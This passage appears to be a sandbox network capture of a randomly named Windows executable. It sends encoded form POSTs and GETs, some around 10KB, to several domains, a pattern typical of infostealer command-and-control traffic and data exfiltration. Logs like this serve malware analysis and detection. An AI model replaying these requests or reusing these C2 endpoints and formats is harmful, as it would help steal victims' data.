                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          8 | 192.168.2.4 | 50015 | 67.223.117.189 | 80 | 4564 | C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Jan 15, 2025 18:16:37.800493956 CET | 385 | OUT | GET /gq43/?V0=h/dnkFjaM/BlMTbdESaBO4yDKWKmOcDz2FnmuGYc567+HDEruSEWMN2Hn86y4gYUgaAN9U29KGW+/f0RM4NOE/Y8+3cOhgXpERP3XxTgx1mSo6tETBq5XpQ=&6NWT=ubtLSzl HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Connection: close
                                                                                                                          Host: www.actionhub.live
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Jan 15, 2025 18:16:38.398361921 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Date: Wed, 15 Jan 2025 17:16:38 GMT
                                                                                                                          Server: Apache
                                                                                                                          Content-Length: 32106
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          9 | 192.168.2.4 | 50016 | 136.243.64.147 | 80 | 4564 | C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Jan 15, 2025 18:16:44.300544024 CET | 678 | OUT | POST /ktot/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 199
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.100millionjobs.africa
                                                                                                                          Origin: http://www.100millionjobs.africa
                                                                                                                          Referer: http://www.100millionjobs.africa/ktot/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Ascii: V0=dv481RjyXXG1dXGi6mlUC0hsbP4EwsT6ixaLtmvZOVass0s18A71BicQ3Qbz93LqnYc30yO73G90y4Op+T4VuL6O6JJljdXMiP9lzQaxZXLrWySo5LCUuIw6EwSh7AmIpe8MnfPR/BhXSVUElFE7CNmL0SZqHIwftB3SlJ6Ui1QJAaAUfNXV06BBDsRExUN5PA==
                                                                                                                          Jan 15, 2025 18:16:44.948040009 CET | 493 | IN | HTTP/1.1 302 Found
                                                                                                                          Date: Wed, 15 Jan 2025 17:16:44 GMT
                                                                                                                          Server: Apache
                                                                                                                          Location: http://maximumgroup.co.za/ktot/
                                                                                                                          Content-Length: 290
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/ktot/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          10 | 192.168.2.4 | 50017 | 136.243.64.147 | 80 | 4564 | C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Jan 15, 2025 18:16:46.853456974 CET | 698 | OUT | POST /ktot/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 219
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.100millionjobs.africa
                                                                                                                          Origin: http://www.100millionjobs.africa
                                                                                                                          Referer: http://www.100millionjobs.africa/ktot/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Ascii: V0=dv481RjyXXG1f2Wi5FdUAUhtC/4E6MSzixeLtkCCOHussW019B71GicQ4wb2wXLjnYQF03u73HZ0y4+p5gASvb6A3pJnndXMiP9lzQ+bZXzrWiCo/e+LtIw5MQShpwmUpe8LneTr/CZXSVEEkUE4bdnA5yYjIKlr1hKloamHlhBtBcNOO82Cm6lyerYw8XwwUN7OMUob9CH4kyyoO37lJj8=
                                                                                                                          Jan 15, 2025 18:16:47.587686062 CET | 493 | IN | HTTP/1.1 302 Found
                                                                                                                          Date: Wed, 15 Jan 2025 17:16:47 GMT
                                                                                                                          Server: Apache
                                                                                                                          Location: http://maximumgroup.co.za/ktot/
                                                                                                                          Content-Length: 290
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/ktot/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          11 | 192.168.2.4 | 50018 | 136.243.64.147 | 80 | 4564 | C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Jan 15, 2025 18:16:49.399667025 CET | 10780 | OUT | POST /ktot/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 10299
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.100millionjobs.africa
                                                                                                                          Origin: http://www.100millionjobs.africa
                                                                                                                          Referer: http://www.100millionjobs.africa/ktot/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Ascii: V0= [TRUNCATED]
                                                                                                                          Jan 15, 2025 18:16:50.021580935 CET | 493 | IN | HTTP/1.1 302 Found
                                                                                                                          Date: Wed, 15 Jan 2025 17:16:49 GMT
                                                                                                                          Server: Apache
                                                                                                                          Location: http://maximumgroup.co.za/ktot/
                                                                                                                          Content-Length: 290
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/ktot/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          12 | 192.168.2.4 | 50019 | 136.243.64.147 | 80 | 4564 | C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Jan 15, 2025 18:16:51.940855026 CET | 392 | OUT | GET /ktot/?6NWT=ubtLSzl&V0=QtQc2mqNJwvMGBSr7V0zPUg2Ke4Xyt62plWHvEnyVDfp5Gg9+XblDX8y1WL79lKxhp5ksn3mik5BgcOnzw4ck6L30rZkuOCe6cRp9wSIOgnwHyHnoLuvl9s= HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Connection: close
                                                                                                                          Host: www.100millionjobs.africa
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Jan 15, 2025 18:16:52.577630043 CET | 771 | IN | HTTP/1.1 302 Found
                                                                                                                          Date: Wed, 15 Jan 2025 17:16:52 GMT
                                                                                                                          Server: Apache
                                                                                                                          Location: http://maximumgroup.co.za/ktot/?6NWT=ubtLSzl&V0=QtQc2mqNJwvMGBSr7V0zPUg2Ke4Xyt62plWHvEnyVDfp5Gg9+XblDX8y1WL79lKxhp5ksn3mik5BgcOnzw4ck6L30rZkuOCe6cRp9wSIOgnwHyHnoLuvl9s=
                                                                                                                          Content-Length: 431
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/ktot/?6NWT=ubtLSzl&amp;V0=QtQc2mqNJwvMGBSr7V0zPUg2Ke4Xyt62plWHvEnyVDfp5Gg9+XblDX8y1WL79lKxhp5ksn3mik5BgcOnzw4ck6L30rZkuOCe6cRp9wSIOgnwHyHnoLuvl9s=">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          13 | 192.168.2.4 | 50020 | 47.83.1.90 | 80 | 4564 | C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Jan 15, 2025 18:17:14.136756897 CET | 648 | OUT | POST /bqha/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 199
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.qzsazi.info
                                                                                                                          Origin: http://www.qzsazi.info
                                                                                                                          Referer: http://www.qzsazi.info/bqha/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Ascii: V0=aY4y9JZpn+maNyqM0p+ssQtkebjrBVowSNOClto1bCd3c7BavvaFPl2eDuNywzU4urhGV35oHwCfYWJQvznP0IwwNVFMyQQxu3VVSh3JPFlKAd+mynMZM1cwWXU0LqYdV/VtQ0IYAhbAiB8XNOCRqZpMyJe4CRIX+EsUPvDDjAUBn3qim8A+Dda/iP/5mIMgCg==


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          14 | 192.168.2.4 | 50021 | 47.83.1.90 | 80 | 4564 | C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Jan 15, 2025 18:17:16.682286978 CET | 668 | OUT | POST /bqha/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 219
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.qzsazi.info
                                                                                                                          Origin: http://www.qzsazi.info
                                                                                                                          Referer: http://www.qzsazi.info/bqha/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Ascii: V0=aY4y9JZpn+maCxiMnY+srwtnQ7jrTVo0SNyCls8faw53delautyFCF2ebeN3+TU3uspOVyBoHw+fYUBQvCnMyYwyYFFOqwQxu3VVShjnPFNKAtOmzC4YXVczRXU0PqYZV/UCQ1l9AijAiEQXNfCSjZom9pfnTDZi40tZMur9rQY1ixn43NhpRd+M/I2NrLxpZo+xKdSvT2n6ywU1Q+uQYhA=
                                                                                                                          Jan 15, 2025 18:17:18.094875097 CET | 137 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.18.0
                                                                                                                          Date: Wed, 15 Jan 2025 17:17:17 GMT
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          15 | 192.168.2.4 | 50022 | 47.83.1.90 | 80 | 4564 | C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Jan 15, 2025 18:17:19.234355927 CET | 10750 | OUT | POST /bqha/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 10299
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.qzsazi.info
                                                                                                                          Origin: http://www.qzsazi.info
                                                                                                                          Referer: http://www.qzsazi.info/bqha/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Ascii: V0= [TRUNCATED]
                                                                                                                          Jan 15, 2025 18:17:20.727809906 CET | 137 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.18.0
                                                                                                                          Date: Wed, 15 Jan 2025 17:17:20 GMT
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          16 | 192.168.2.4 | 50023 | 47.83.1.90 | 80 | 4564 | C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Jan 15, 2025 18:17:21.785057068 CET | 382 | OUT | GET /bqha/?V0=XaQS++1s5Z2sQk6g657UrSdcX7H3EUdTMtu3zec/e2geVsN/mry3D0SmJYJJ828Xh6gONHNOHW6qADxKsznE6ZdUGRZN1xACtCVpUj7MYkJvH6jcy3tgXEM=&6NWT=ubtLSzl HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Connection: close
                                                                                                                          Host: www.qzsazi.info
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Jan 15, 2025 18:17:23.413017035 CET | 139 | IN | HTTP/1.1 567 unknown
                                                                                                                          Server: nginx/1.18.0
                                                                                                                          Date: Wed, 15 Jan 2025 17:17:23 GMT
                                                                                                                          Content-Length: 17
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                                                                                          Data Ascii: Request too large


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          17 | 192.168.2.4 | 50024 | 84.32.84.32 | 80 | 4564 | C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Jan 15, 2025 18:17:28.550195932 CET | 660 | OUT | POST /m320/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 199
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.truckgoway.info
                                                                                                                          Origin: http://www.truckgoway.info
                                                                                                                          Referer: http://www.truckgoway.info/m320/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Ascii: V0=CjcpzjRL9l2ZG+GUmXINJCo3rBTsy8wGyNDsjFF6paYycsgMXL7aQgdE+j7GlzN9ymD2JEpb8wLRKCdZO5PQ5Sal39YtSvFtF6THrzu+pedot127hOs0wyGYn4joBVb5ZD8h0qNh1yRwmW8y53mO2SCI2a9jEAeym6bztdEQLe1t2GqEAJnf8irMdx+tdbaqkw==


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          18 | 192.168.2.4 | 50025 | 84.32.84.32 | 80 | 4564 | C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Jan 15, 2025 18:17:31.106359005 CET | 680 | OUT | POST /m320/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 219
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.truckgoway.info
                                                                                                                          Origin: http://www.truckgoway.info
                                                                                                                          Referer: http://www.truckgoway.info/m320/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Ascii: V0=CjcpzjRL9l2ZUuWU1kQNOio0uBTs5cwKyNPsjAhqpIMyFNQMFfvaTgdE2D6thzN0yhL+JFlb8z3RKDtZOObTjian/dY4dPFtF6THrz6Upf5otFG7gqY35SGb3ojoFVayZD8X0rQp10NwmVoy5leRhCCOya8qESC6pIX5tOwjMPts6gneR4GIuiP/A23ZQYnj/7zAfFrSy4NNwkAwZCoKyEM=


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          19 | 192.168.2.4 | 50026 | 84.32.84.32 | 80 | 4564 | C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Jan 15, 2025 18:17:34.225218058 CET | 10762 | OUT | POST /m320/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 10299
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.truckgoway.info
                                                                                                                          Origin: http://www.truckgoway.info
                                                                                                                          Referer: http://www.truckgoway.info/m320/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          20 | 192.168.2.4 | 50027 | 84.32.84.32 | 80 | 4564 | C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Jan 15, 2025 18:17:36.770253897 CET | 386 | OUT | GET /m320/?V0=Ph0JwVcw7zzuTeHjokN+Pj0vqxzi/qoK5eH0o0l2w/5oKsNqReXVchdY7BGekisn6nC+H3gPoTPDUk5nD7LsnmjV2eR6T95oFo+TtC+4wolZhiL0ouse1nU=&6NWT=ubtLSzl HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Connection: close
                                                                                                                          Host: www.truckgoway.info
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Jan 15, 2025 18:17:37.237879992 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                          Date: Wed, 15 Jan 2025 17:17:37 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 9973
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Server: hcdn
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          x-hcdn-request-id: 252268993f3336709444ccabcdb2317a-bos-edge2
                                                                                                                          Expires: Wed, 15 Jan 2025 17:17:36 GMT
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          21 | 192.168.2.4 | 50028 | 213.171.195.105 | 80 | 4564 | C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Jan 15, 2025 18:17:42.351341009 CET | 675 | OUT | POST /he9k/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 199
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.aloezhealthcare.info
                                                                                                                          Origin: http://www.aloezhealthcare.info
                                                                                                                          Referer: http://www.aloezhealthcare.info/he9k/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Ascii: V0=5Oga9EzjhERs0F/obsXa2GqspK4LEzdvD1BtcBk+gzdLLl1AhObuTMzCSZGPp20pRDwmdcYAXIXYasO56Qz26PYg3G93BAFLYKnqJPhhxAsunsRY9kKz0JRsLcXT96Iw9TR7lMwkl5jepfQmvO5wYuN+05UUVIuqX/ZZyaaSGKrLCgiQS0pjRXKMee3csS2YDw==
                                                                                                                          Jan 15, 2025 18:17:42.949337006 CET | 309 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                          server: nginx/1.20.1
                                                                                                                          date: Wed, 15 Jan 2025 17:17:42 GMT
                                                                                                                          content-type: text/html
                                                                                                                          content-length: 157
                                                                                                                          connection: close
                                                                                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          22 | 192.168.2.4 | 50029 | 213.171.195.105 | 80 | 4564 | C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Jan 15, 2025 18:17:44.957339048 CET | 695 | OUT | POST /he9k/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 219
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.aloezhealthcare.info
                                                                                                                          Origin: http://www.aloezhealthcare.info
                                                                                                                          Referer: http://www.aloezhealthcare.info/he9k/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Ascii: V0=5Oga9EzjhERs1mnoeP/aj2qtsK4LNTdrD1NtcF91hB5LIEFAiPbuUMzCKJGGmW1rRDNTdcUAXIDYauW56hz17fYij291cQFLYKnqJP08xA0unf5Ysx2wqZRvIcXT56J79TRVlNsel9Tepa0m2/5zTuNk5ZUEYsilONdYtKONL6z1DmvKDFI0DXu/DZ+ohRLRYyGIxUenVj9LgLkozjQTdTI=
                                                                                                                          Timestamp: Jan 15, 2025 18:17:45.532556057 CET, Bytes transferred: 309, Direction: IN
                                                                                                                          HTTP/1.1 405 Not Allowed
                                                                                                                          server: nginx/1.20.1
                                                                                                                          date: Wed, 15 Jan 2025 17:17:45 GMT
                                                                                                                          content-type: text/html
                                                                                                                          content-length: 157
                                                                                                                          connection: close
